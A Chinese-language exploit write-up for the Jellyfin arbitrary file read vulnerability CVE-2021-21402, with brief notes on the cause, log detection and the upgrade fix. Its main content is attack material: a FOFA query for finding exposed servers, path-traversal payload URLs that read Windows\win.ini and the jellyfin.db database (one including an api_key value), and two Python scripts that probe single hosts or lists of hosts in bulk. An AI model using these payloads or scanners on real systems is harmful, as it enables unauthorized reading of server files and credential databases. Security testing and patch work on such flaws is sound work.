Jellyfin任意文件读取漏洞(CVE-2021-21402)
FOFA语句:
title="Jellyfin"
可以通过访问
http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/
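读取任意文件。原因是 URL 中的 <文件路径> 段未经规范化就被用于拼接服务端文件路径,`..\`(URL 编码为 `..%5C`)可以跳出媒体目录;由于使用反斜杠作为路径分隔符,该问题主要影响以 Windows 为宿主系统的服务器。
排查时可在访问日志中检索 /Audio/…/hls/ 或 /Videos/…/hls/ 路径里出现的 `..%5C`、`..\`;修复方式是升级到已修补该漏洞的 Jellyfin 版本,并避免将服务直接暴露在公网。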
POC:
http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Content-Type: application/octet-stream
其它URL:
/Audio/anything/hls/..\data\jellyfin.db/stream.mp3/
/Videos/anything/hls/m/..\data\jellyfin.db
/Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7
batch.py(python3)
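# Batch check: probe every base URL listed in a text file (one per line)
# for the Jellyfin path traversal CVE-2021-21402.
import sys

import requests
import urllib3

# Certificate verification is disabled on the request below (verify=False),
# so the matching urllib3 warning is silenced here. The response can
# therefore come from any TLS endpoint, not necessarily the intended host.
urllib3.disable_warnings()

# Traversal probe appended to each base URL; it asks for Windows\win.ini,
# so it is only meaningful against Windows hosts.
PROBE_PATH = "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"

HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
    "Content-Type": "application/octet-stream",
}

# Seconds to wait per host; without a timeout one silent host stalls the run.
REQUEST_TIMEOUT = 10


def main():
    """Read base URLs from the file named in argv[1] and report each result.

    Prints one line per URL. A usage error exits with status 1.
    """
    if len(sys.argv) != 2:
        print('Usage: python3 xxx.py urls.txt')
        sys.exit(1)

    # Read-only mode is enough (the original opened the list with 'r+'),
    # and the context manager closes the handle when the loop ends.
    with open(sys.argv[1], 'r') as f:
        for line in f:
            base = line.strip()
            if not base:
                # A blank line would otherwise become a scheme-less URL.
                continue
            url = base + PROBE_PATH
            try:
                response = requests.get(
                    url,
                    headers=HEADERS,
                    verify=False,
                    timeout=REQUEST_TIMEOUT,
                )
            except requests.RequestException as exc:
                # One unreachable or malformed entry must not abort the batch.
                print(url + " " + "请求失败: " + str(exc))
                continue

            # NOTE(review): the verdict rests on the status code alone. A
            # proxy or catch-all page that answers 200 for any path yields a
            # false positive, and a non-Windows host yields a negative result
            # whatever its patch level. Confirm findings against the
            # installed Jellyfin version before acting on them.
            if response.status_code == 200:
                print(url + " " + "存在漏洞")
            else:
                print(url + " " + "不存在漏洞")


if __name__ == "__main__":
    main()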
single.py(python3)
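# Single-host check: probe one base URL for the Jellyfin path traversal
# CVE-2021-21402.
import sys

import requests
import urllib3

# Certificate verification is disabled on the request below (verify=False),
# so the matching urllib3 warning is silenced here. The response can
# therefore come from any TLS endpoint, not necessarily the intended host.
urllib3.disable_warnings()

# Traversal probe appended to the base URL; it asks for Windows\win.ini,
# so it is only meaningful against Windows hosts.
PROBE_PATH = "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"

HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
    "Content-Type": "application/octet-stream",
}

# Seconds to wait for the host; without a timeout the script can hang.
REQUEST_TIMEOUT = 10


def main():
    """Probe the base URL given in argv[1] and print the verdict.

    A usage error or a failed request exits with status 1.
    """
    if len(sys.argv) != 2:
        print('Usage: python3 xxx.py http://xxx.xxx.xxx.xxx ')
        sys.exit(1)

    url = sys.argv[1] + PROBE_PATH
    try:
        response = requests.get(
            url,
            headers=HEADERS,
            verify=False,
            timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException as exc:
        # Report a connection problem as such instead of a raw traceback;
        # it is not evidence for either verdict.
        print("请求失败: " + str(exc))
        sys.exit(1)

    # NOTE(review): the verdict rests on the status code alone. A proxy or
    # catch-all page that answers 200 for any path yields a false positive,
    # and a non-Windows host yields a negative result whatever its patch
    # level. Confirm against the installed Jellyfin version.
    if response.status_code == 200:
        print("存在漏洞")
    else:
        print("不存在漏洞")


if __name__ == "__main__":
    main()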